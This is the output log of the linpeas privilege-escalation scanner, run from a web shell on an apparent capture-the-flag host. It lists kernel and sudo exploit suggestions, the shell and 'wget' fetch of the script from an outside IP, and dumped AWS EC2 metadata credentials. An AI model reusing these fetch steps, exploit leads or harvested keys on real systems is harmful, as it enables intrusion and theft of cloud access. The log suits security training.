▄▄▄▄▄▄▄▄▄▄▄▄▄▄
                    ▄▄▄▄▄▄▄             ▄▄▄▄▄▄▄▄
             ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄
         ▄▄▄▄     ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄
         ▄    ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄       ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄          ▄▄▄▄▄▄               ▄▄▄▄▄▄ ▄
         ▄▄▄▄▄▄              ▄▄▄▄▄▄▄▄                 ▄▄▄▄ 
         ▄▄                  ▄▄▄ ▄▄▄▄▄                  ▄▄▄
         ▄▄                ▄▄▄▄▄▄▄▄▄▄▄▄                  ▄▄
         ▄            ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄   ▄▄
         ▄      ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄                                ▄▄▄▄
         ▄▄▄▄▄  ▄▄▄▄▄                       ▄▄▄▄▄▄     ▄▄▄▄
         ▄▄▄▄   ▄▄▄▄▄                       ▄▄▄▄▄      ▄ ▄▄
         ▄▄▄▄▄  ▄▄▄▄▄        ▄▄▄▄▄▄▄        ▄▄▄▄▄     ▄▄▄▄▄
         ▄▄▄▄▄▄  ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄   ▄▄▄▄▄ 
          ▄▄▄▄▄▄▄▄▄▄▄▄▄▄        ▄          ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ 
         ▄▄▄▄▄▄▄▄▄▄▄▄▄                       ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄                         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄            ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
          ▀▀▄▄▄   ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀
               ▀▀▀▄▄▄▄▄      ▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▀▀
                     ▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀

    /---------------------------------------------------------------------------------\
    |                             Do you like PEASS?                                  |
    |---------------------------------------------------------------------------------|
    |         Get the latest version    :     https://github.com/sponsors/carlospolop |
    |         Follow on Twitter         :     @hacktricks_live                        |
    |         Respect on HTB            :     SirBroccoli                             |
    |---------------------------------------------------------------------------------|
    |                                 Thank you!                                      |
    \---------------------------------------------------------------------------------/
          linpeas-ng by carlospolop

ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.

Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist
 LEGEND:
  RED/YELLOW: 95% a PE vector
  RED: You should take a look to it
  LightCyan: Users with console
  Blue: Users without console & mounted devs
  Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) 
  LightMagenta: Your username

 Starting linpeas. Caching Writable Folders...

                               ╔═══════════════════╗
═══════════════════════════════╣ Basic information ╠═══════════════════════════════
                               ╚═══════════════════╝
OS: Linux version 3.10.0-1062.el7.x86_64 (mockbuild@kbuilder.bsys.centos.org) (gcc version 4.8.5 20150623 (Red Hat 4.8.5-36) (GCC) ) #1 SMP Wed Aug 7 18:08:02 UTC 2019
User & Groups: uid=48(apache) gid=48(apache) groups=48(apache)
Hostname: dailybugle
Writable folder: /dev/shm
[+] /usr/bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /usr/bin/bash is available for network discovery, port scanning and port forwarding (linpeas can discover hosts, scan ports, and forward ports. Learn more with -h)
[+] /usr/bin/nc is available for network discovery & port scanning (linpeas can discover hosts and scan ports, learn more with -h)

[+] nmap is available for network discovery & port scanning, you should use it yourself


Caching directories DONE

                              ╔════════════════════╗
══════════════════════════════╣ System Information ╠══════════════════════════════
                              ╚════════════════════╝
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 3.10.0-1062.el7.x86_64 (mockbuild@kbuilder.bsys.centos.org) (gcc version 4.8.5 20150623 (Red Hat 4.8.5-36) (GCC) ) #1 SMP Wed Aug 7 18:08:02 UTC 2019
lsb_release Not Found

╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.23


╔══════════╣ PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin

╔══════════╣ Date & uptime
Sun Oct  1 00:52:45 EDT 2023
 00:52:45 up  2:43,  0 users,  load average: 0.24, 0.06, 0.06

╔══════════╣ Any sd*/disk* disk in /dev? (limit 20)
disk

╔══════════╣ Unmounted file-system?
╚ Check if you can mount umounted devices

/dev/mapper/centos-root	/	xfs	defaults	0 0
UUID=9e2c8318-174c-4a83-a33c-c7fd97b900fc	/boot	xfs	defaults	0 0
/dev/mapper/centos-swap	swap	swap	defaults	0 0

╔══════════╣ Environment
╚ Any private information inside environment variables?
HISTSIZE=0
HISTFILESIZE=0
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
PWD=/tmp
LANG=C
NOTIFY_SOCKET=/run/systemd/notify
SHLVL=3
HISTFILE=/dev/null
_=/usr/bin/env

╔══════════╣ Searching Signature verification failed in dmesg
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#dmesg-signature-verification-failed
dmesg Not Found

╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2016-5195] dirtycow

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},[ RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7} ],ubuntu=16.04|14.04|12.04
   Download URL: https://www.exploit-db.com/download/40611
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2016-5195] dirtycow 2

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: debian=7|8,[ RHEL=5|6|7 ],ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
   Download URL: https://www.exploit-db.com/download/40839
   ext-url: https://www.exploit-db.com/download/40847
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2017-1000253] PIE_stack_corruption

   Details: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.txt
   Exposure: probable
   Tags: RHEL=6,[ RHEL=7 ]{kernel:3.10.0-514.21.2|3.10.0-514.26.1}
   Download URL: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.c

[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)

   Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
   Exposure: less probable
   Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
   Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2021-4034] PwnKit

   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: less probable
   Tags: ubuntu=10|11|12|13|14|15|16|17|18|19|20|21,debian=7|8|9|10|11,fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: mint=19,ubuntu=18|20, debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit 2

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded

[+] [CVE-2019-18634] sudo pwfeedback

   Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
   Exposure: less probable
   Tags: mint=19
   Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
   Comments: sudo configuration requires pwfeedback to be enabled.

[+] [CVE-2019-15666] XFRM_UAF

   Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc
   Exposure: less probable
   Download URL: 
   Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled

[+] [CVE-2018-1000001] RationalLove

   Details: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/
   Exposure: less probable
   Tags: debian=9{libc6:2.24-11+deb9u1},ubuntu=16.04.3{libc6:2.23-0ubuntu9}
   Download URL: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/RationalLove.c
   Comments: kernel.unprivileged_userns_clone=1 required

[+] [CVE-2017-7308] af_packet

   Details: https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
   Exposure: less probable
   Tags: ubuntu=16.04{kernel:4.8.0-(34|36|39|41|42|44|45)-generic}
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-7308/poc.c
   Comments: CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at 'ext-url' adds support for additional kernels

[+] [CVE-2017-6074] dccp

   Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
   Exposure: less probable
   Tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic}
   Download URL: https://www.exploit-db.com/download/41458
   Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass

[+] [CVE-2017-1000366,CVE-2017-1000379] linux_ldso_hwcap_64

   Details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
   Exposure: less probable
   Tags: debian=7.7|8.5|9.0,ubuntu=14.04.2|16.04.2|17.04,fedora=22|25,centos=7.3.1611
   Download URL: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_hwcap_64.c
   Comments: Uses "Stack Clash" technique, works against most SUID-root binaries

[+] [CVE-2016-2384] usb-midi

   Details: https://xairy.github.io/blog/2016/cve-2016-2384
   Exposure: less probable
   Tags: ubuntu=14.04,fedora=22
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384/poc.c
   Comments: Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user

[+] [CVE-2015-9322] BadIRET

   Details: http://labs.bromium.com/2015/02/02/exploiting-badiret-vulnerability-cve-2014-9322-linux-kernel-privilege-escalation/
   Exposure: less probable
   Tags: RHEL<=7,fedora=20
   Download URL: http://site.pi3.com.pl/exp/p_cve-2014-9322.tar.gz

[+] [CVE-2015-8660] overlayfs (ovl_setattr)

   Details: http://www.halfdog.net/Security/2015/UserNamespaceOverlayfsSetuidWriteExec/
   Exposure: less probable
   Tags: ubuntu=(14.04|15.10){kernel:4.2.0-(18|19|20|21|22)-generic}
   Download URL: https://www.exploit-db.com/download/39166

[+] [CVE-2015-8660] overlayfs (ovl_setattr)

   Details: http://www.halfdog.net/Security/2015/UserNamespaceOverlayfsSetuidWriteExec/
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/39230

[+] [CVE-2015-3246] userhelper

   Details: https://www.qualys.com/2015/07/23/cve-2015-3245-cve-2015-3246/cve-2015-3245-cve-2015-3246.txt
   Exposure: less probable
   Tags: RHEL=6{libuser:0.56.13-(4|5).el6},RHEL=6{libuser:0.60-5.el7},fedora=13|19|20|21|22
   Download URL: https://www.exploit-db.com/download/37706
   Comments: RHEL 5 is also vulnerable, but installed version of glibc (2.5) lacks functions needed by roothelper.c

[+] [CVE-2014-5207] fuse_suid

   Details: https://www.exploit-db.com/exploits/34923/
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/34923

[+] [CVE-2014-4014] inode_capable

   Details: http://www.openwall.com/lists/oss-security/2014/06/10/4
   Exposure: less probable
   Tags: ubuntu=12.04
   Download URL: https://www.exploit-db.com/download/33824

[+] [CVE-2014-0196] rawmodePTY

   Details: http://blog.includesecurity.com/2014/06/exploit-walkthrough-cve-2014-0196-pty-kernel-race-condition.html
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/33516

[+] [CVE-2016-0728] keyring

   Details: http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/40003
   Comments: Exploit takes about ~30 minutes to run. Exploit is not reliable, see: https://cyseclabs.com/blog/cve-2016-0728-poc-not-working


╔══════════╣ Executing Linux Exploit Suggester 2
╚ https://github.com/jondonas/linux-exploit-suggester-2
  [1] exploit_x
      CVE-2018-14665
      Source: http://www.exploit-db.com/exploits/45697
  [2] pp_key
      CVE-2016-0728
      Source: http://www.exploit-db.com/exploits/39277
  [3] timeoutpwn
      CVE-2014-0038
      Source: http://www.exploit-db.com/exploits/31346


╔══════════╣ Protections
═╣ AppArmor enabled? .............. AppArmor Not Found
═╣ AppArmor profile? .............. unconfined
═╣ is linuxONE? ................... s390x Not Found
═╣ grsecurity present? ............ grsecurity Not Found
═╣ PaX bins present? .............. PaX Not Found
═╣ Execshield enabled? ............ Execshield Not Found
═╣ SELinux enabled? ............... SELinux status:                 disabled
═╣ Seccomp enabled? ............... disabled
═╣ User namespace? ................ enabled
═╣ Cgroup2 enabled? ............... disabled
═╣ Is ASLR enabled? ............... Yes
═╣ Printer? ....................... No
═╣ Is this a virtual machine? ..... Yes (xen)

                                   ╔═══════════╗
═══════════════════════════════════╣ Container ╠═══════════════════════════════════
                                   ╚═══════════╝
╔══════════╣ Container related tools present (if any):
╔══════════╣ Am I Containered?
╔══════════╣ Container details
═╣ Is this a container? ........... No
═╣ Any running containers? ........ No


                                     ╔═══════╗
═════════════════════════════════════╣ Cloud ╠═════════════════════════════════════
                                     ╚═══════╝
═╣ Google Cloud Platform? ............... No
═╣ AWS ECS? ............................. No
═╣ AWS EC2? ............................. Yes
═╣ AWS EC2 Beanstalk? ................... No
═╣ AWS Lambda? .......................... No
═╣ AWS Codebuild? ....................... No
═╣ DO Droplet? .......................... No
═╣ IBM Cloud VM? ........................ No
═╣ Azure VM? ............................ No
═╣ Azure APP? ........................... No

╔══════════╣ AWS EC2 Enumeration
ami-id: ami-002ffec3580ba4c57
instance-action: none
instance-id: i-05b6886179a5d04fe
instance-life-cycle: on-demand
instance-type: t2.nano
region: eu-west-1

══╣ Account Info
{
  "Code" : "Success",
  "LastUpdated" : "2023-10-01T04:42:19Z",
  "AccountId" : "739930428441"
}

══╣ Network Info
Mac: 02:4a:61:51:80:5b/
Owner ID: 739930428441
Public Hostname: 
Security Groups: AllowEverything
Private IPv4s:

Subnet IPv4: 10.10.0.0/16
PrivateIPv6s:

Subnet IPv6: 
Public IPv4s:



══╣ IAM Role


══╣ User Data


EC2 Security Credentials
{
  "Code" : "Success",
  "LastUpdated" : "2023-10-01T04:42:00Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIA2YR2KKQMTWZCMUX6",
  "SecretAccessKey" : "QqWNCJvrEdOfBhnBzNBgVS2eCbGdiYHORxsemzGs",
  "Token" : "IQoJb3JpZ2luX2VjEO3//////////wEaCWV1LXdlc3QtMSJHMEUCIC1zVahnhs1UJRTYX6MqV/fBLRj76t+V9LvhJtRSE/saAiEAiel+pSQYMm0z6c9yuUeCys4Uo2uYoxQmlNGieKJiYJcqzwQI5v//////////ARADGgw3Mzk5MzA0Mjg0NDEiDOqe2KMdP57J6HG18CqjBCBVZUWEqd3s73WhAwg/DO57iWqdY/56m18VIOO9x1P9AcaMnyH+qOCDzU/gU3AQcLs5RHK4KxuDYD1coxD0+5gWNpkSLnYQve/N0r4nEoPPQgdfJF88kr8ifOAZObFZcZo/ku1bSeAfiYBnwCV0kR6sEZcdB6QnmK7vmIIaOAk363LHwyA6RrH4RpxH28PZmrUsUeIfosX9Oit+rEepnxUj6e9XztUrVq+AEFups6DSEA8zD0w4Ozd9+sxU2sR9lTkqBgR77sCYyHtEigxbdk4soLD6qo6jq1yuLeIl6Md39/44AUDMDO2DHw+vOey7h6lzRwBqYSvzT6ObWMFScBknTymNkilT0PIovhEHQU+cMH4JP+L8X3O2/oI0jFB8ZgovXnZi8tVeilmHp8/3whrGrysifzd0Oz0JL6FTmJzG7mLZvpZC5dDPGn9lOfAfcByX0ZyD0eDlXkwQQpSWycGq/k46te++dRiXVEZDuocUuIXRwE+2w578e2hXMfYBPl5XHVDovDV8acc055yARfS+eyrRdG83YbrR67Ymqs8L3MdinBcTPTBvIV6DKRRcOxWoCtaWdNWnqoMkRHeonx7oSqR2jI/9QkPUpfTtU1bbJZ47beg9dfcSEnrvX2YQos95QNPqy9VWlgudKdREMSgnNVmcQw3T6biXMx7JHjAHg7akskOQ3W1vbCYMb04IKwJiRtOngpIQxoloFPf5u3fGBiMwgPHjqAY6kwJv8OaVTMSAH/m4jQ/Iad1iEcuJ4PaBoMb53IhZICSXj4Ni1CWrhVPcoy/ZDn7v4BKcnQDRWBxkBoRtKZ0zGulTF5ovBY0gFSlTW9teXpu7BO6MdqvT5BVg3NNMBLV+ohVPAkke+FPpJA4uRtfy65rxxSG9gFcEqZoK9gUMpBaaVm7kv5CeM29fGBGdPiVnWtHwhPlTewUfum6adXiOlhRxjGf59YMk65Pv2WUfHyzf0sDDD3CWdVWACBadgc0Nfr6jYA0ESBirGLHZNHFb3T6nYSMqk8R/oHV+aBVFvnBmbgnNg6EZB50vc34Mwb687OR6KLnRTpoJfOQKw6ZrrxYWSoC6Pcu/mIkrGxEuwtbz66u7HA==",
  "Expiration" : "2023-10-01T11:00:22Z"
}
══╣ SSM Runnig
apache    9912  0.0  0.1  13320   664 ?        S    00:52   0:00 sed s,ssm-agent,.[1;31m&.[0m,


                ╔════════════════════════════════════════════════╗
════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════
                ╚════════════════════════════════════════════════╝
╔══════════╣ Cleaned processes
╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
root         1  0.1  0.5 125364  2780 ?        Ss   Sep30   0:10 /usr/lib/systemd/systemd --switched-root --system --deserialize 22
root       466  0.0  0.3  34984  1776 ?        Ss   Sep30   0:00 /usr/lib/systemd/systemd-journald
root       488  0.0  0.0 190372   400 ?        Ss   Sep30   0:00 /usr/sbin/lvmetad -f
root       493  0.0  0.1  45304   956 ?        Ss   Sep30   0:02 /usr/lib/systemd/systemd-udevd
root       610  0.0  0.1  55528   528 ?        S<sl Sep30   0:00 /sbin/auditd
dbus       632  0.0  0.2  58236  1472 ?        Ss   Sep30   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
  └─(Caps) 0x0000000020000000=cap_audit_write
polkitd    635  0.0  0.3 612244  1544 ?        Ssl  Sep30   0:00 /usr/lib/polkit-1/polkitd --no-debug
root       637  0.0  0.2  26380  1420 ?        Ss   Sep30   0:00 /usr/lib/systemd/systemd-logind
root       638  0.0  0.5 474036  2820 ?        Ssl  Sep30   0:01 /usr/sbin/NetworkManager --no-daemon[0m
root       647  0.0  0.1 126292   736 ?        Ss   Sep30   0:00 /usr/sbin/crond -n
chrony     649  0.0  0.3 120404  1596 ?        S    Sep30   0:00 /usr/sbin/chronyd
  └─(Caps) 0x0000000002000400=cap_net_bind_service,cap_sys_time
root       877  0.0  0.1 102896   864 ?        Ss   Sep30   0:00 /sbin/dhclient -1 -q -lf /var/lib/dhclient/dhclient--eth0.lease -pf /var/run/dhclient-eth0.pid -H dailybugle eth0
root       934  0.0  1.1 418092  5604 ?        Ss   Sep30   0:03 /usr/sbin/httpd -DFOREGROUND
apache    2537  0.8  3.3 601544 16780 ?        S    Sep30   1:01  _ /usr/sbin/httpd -DFOREGROUND
apache    2573  0.8  3.2 527812 16208 ?        S    Sep30   1:02  _ /usr/sbin/httpd -DFOREGROUND
apache    2575  0.8  3.2 527812 16108 ?        S    Sep30   0:57  _ /usr/sbin/httpd -DFOREGROUND
apache    2577  0.8  3.3 601544 16780 ?        S    Sep30   1:02  _ /usr/sbin/httpd -DFOREGROUND
apache    2629  0.8  4.2 532472 20896 ?        S    Sep30   0:58  _ /usr/sbin/httpd -DFOREGROUND
apache    5486  0.0  0.2  11688  1344 ?        S    00:51   0:00  |   _ sh -c uname -a; w; id; /bin/sh -i
apache    5490  0.0  0.3  11824  1712 ?        S    00:51   0:00  |       _ /bin/sh -i
apache    5563  1.3  0.6  13568  3388 ?        S    00:52   0:00  |           _ /bin/sh ./linpeas.sh
apache    9926  0.0  0.4  13568  2396 ?        S    00:52   0:00  |           |   _ /bin/sh ./linpeas.sh
apache    9930  0.0  0.3  51880  1800 ?        R    00:52   0:00  |           |   |   _ ps fauxwww
apache    9929  0.0  0.4  13568  2188 ?        S    00:52   0:00  |           |   _ /bin/sh ./linpeas.sh
apache    5564  0.0  0.0   4364   352 ?        S    00:52   0:00  |           _ tee
apache    2666  0.8  3.3 528068 16432 ?        S    Sep30   0:58  _ /usr/sbin/httpd -DFOREGROUND
apache    2690  0.8  3.2 528068 16356 ?        S    Sep30   0:56  _ /usr/sbin/httpd -DFOREGROUND
apache    2722  0.8  4.1 532400 20472 ?        S    Sep30   0:58  _ /usr/sbin/httpd -DFOREGROUND
apache    5178  0.0  0.2  11688  1348 ?        S    00:45   0:00  |   _ sh -c uname -a; w; id; /bin/sh -i
apache    5182  0.0  0.3  11824  1692 ?        S    00:45   0:00  |       _ /bin/sh -i
apache    5469  0.0  0.4  45240  2316 ?        S    00:51   0:00  |           _ wget http://10.6.90.19:8000/linpeas.sh
apache    4526  0.0  3.5 529360 17672 ?        S    00:00   0:01  _ /usr/sbin/httpd -DFOREGROUND
apache    4621  0.0  2.2 522848 11076 ?        S    00:11   0:00  _ /usr/sbin/httpd -DFOREGROUND
root       935  0.0  0.1 112920   932 ?        Ss   Sep30   0:00 /usr/sbin/sshd -D
root       938  0.0  0.5 574200  2836 ?        Ssl  Sep30   0:03 /usr/bin/python2 -Es /usr/sbin/tuned -l -P
root       940  0.0  0.3 218664  1964 ?        Ssl  Sep30   0:01 /usr/sbin/rsyslogd -n
root       987  0.0  0.0 110108   464 ttyS0    Ss+  Sep30   0:00 /sbin/agetty --keep-baud 115200,38400,9600 ttyS0 vt220
root       988  0.0  0.0 110108   480 tty1     Ss+  Sep30   0:00 /sbin/agetty --noclear tty1 linux
mysql     1010  0.0  0.1 113316   504 ?        Ss   Sep30   0:00 /bin/sh /usr/bin/mysqld_safe --basedir=/usr
mysql     1265  0.6 13.0 1176824 64708 ?       Sl   Sep30   1:05  _ /usr/libexec/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib64/mysql/plugin --log-error=/var/log/mariadb/mariadb.log --pid-file=/var/run/mariadb/mariadb.pid --socket=/var/lib/mysql/mysql.sock
root      1493  0.0  0.3  89700  1708 ?        Ss   Sep30   0:00 /usr/libexec/postfix/master -w
postfix   1505  0.0  0.4  89996  2080 ?        S    Sep30   0:00  _ qmgr -l -t unix -u
postfix   4472  0.0  0.8  89804  4056 ?        S    Sep30   0:00  _ pickup -l -t unix -u

╔══════════╣ Binary processes permissions (non 'root root' and not belonging to current user)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes

╔══════════╣ Processes whose PPID belongs to a different user (not root)
╚ You will know if a user can somehow spawn processes as a different user
Proc 632 with ppid 1 is run by user dbus but the ppid user is root
Proc 635 with ppid 1 is run by user polkitd but the ppid user is root
Proc 649 with ppid 1 is run by user chrony but the ppid user is root
Proc 1010 with ppid 1 is run by user mysql but the ppid user is root
Proc 1505 with ppid 1493 is run by user postfix but the ppid user is root
Proc 2537 with ppid 934 is run by user apache but the ppid user is root
Proc 2573 with ppid 934 is run by user apache but the ppid user is root
Proc 2575 with ppid 934 is run by user apache but the ppid user is root
Proc 2577 with ppid 934 is run by user apache but the ppid user is root
Proc 2629 with ppid 934 is run by user apache but the ppid user is root
Proc 2666 with ppid 934 is run by user apache but the ppid user is root
Proc 2690 with ppid 934 is run by user apache but the ppid user is root
Proc 2722 with ppid 934 is run by user apache but the ppid user is root
Proc 4472 with ppid 1493 is run by user postfix but the ppid user is root
Proc 4526 with ppid 934 is run by user apache but the ppid user is root
Proc 4621 with ppid 934 is run by user apache but the ppid user is root

╔══════════╣ Files opened by processes belonging to other users
╚ This is usually empty because of the lack of privileges to read other user processes information

╔══════════╣ Processes with credentials in memory (root req)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#credentials-from-process-memory
gdm-password Not Found
gnome-keyring-daemon Not Found
lightdm Not Found
vsftpd Not Found
apache2 Not Found
sshd Not Found

╔══════════╣ Cron jobs
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs
/usr/bin/crontab
incrontab Not Found
-rw-------. 1 root root   0 Aug  8  2019 /etc/cron.deny
-rw-r--r--. 1 root root 451 Jun  9  2014 /etc/crontab

/etc/cron.d:
total 16
drwxr-xr-x.  2 root root   21 Dec 14  2019 .
drwxr-xr-x. 79 root root 8192 Jan 14  2020 ..
-rw-r--r--.  1 root root  128 Aug  8  2019 0hourly

/etc/cron.daily:
total 20
drwxr-xr-x.  2 root root   42 Dec 14  2019 .
drwxr-xr-x. 79 root root 8192 Jan 14  2020 ..
-rwx------.  1 root root  219 Oct 30  2018 logrotate
-rwxr-xr-x.  1 root root  618 Oct 30  2018 man-db.cron

/etc/cron.hourly:
total 16
drwxr-xr-x.  2 root root   22 Jun  9  2014 .
drwxr-xr-x. 79 root root 8192 Jan 14  2020 ..
-rwxr-xr-x.  1 root root  392 Aug  8  2019 0anacron

/etc/cron.monthly:
total 12
drwxr-xr-x.  2 root root    6 Jun  9  2014 .
drwxr-xr-x. 79 root root 8192 Jan 14  2020 ..

/etc/cron.weekly:
total 12
drwxr-xr-x.  2 root root    6 Jun  9  2014 .
drwxr-xr-x. 79 root root 8192 Jan 14  2020 ..

/var/spool/anacron:
total 12
drwxr-xr-x. 2 root root 63 Dec 14  2019 .
drwxr-xr-x. 8 root root 87 Dec 14  2019 ..
-rw-------. 1 root root  9 Dec 15  2019 cron.daily
-rw-------. 1 root root  9 Dec 15  2019 cron.monthly
-rw-------. 1 root root  9 Dec 15  2019 cron.weekly
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root




╔══════════╣ Systemd PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#systemd-path-relative-paths
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin

╔══════════╣ Analyzing .service files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services
You can't write on systemd PATH

╔══════════╣ System timers
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers
NEXT                         LEFT     LAST                         PASSED       UNIT                         ACTIVATES
Sun 2023-10-01 22:24:08 EDT  21h left Sat 2023-09-30 22:24:07 EDT  2h 28min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
n/a                          n/a      n/a                          n/a          systemd-readahead-done.timer systemd-readahead-done.service

╔══════════╣ Analyzing .timer files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers

╔══════════╣ Analyzing .socket files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets
/usr/lib/systemd/system/dbus.socket is calling this writable listener: /run/dbus/system_bus_socket
/usr/lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /run/dbus/system_bus_socket
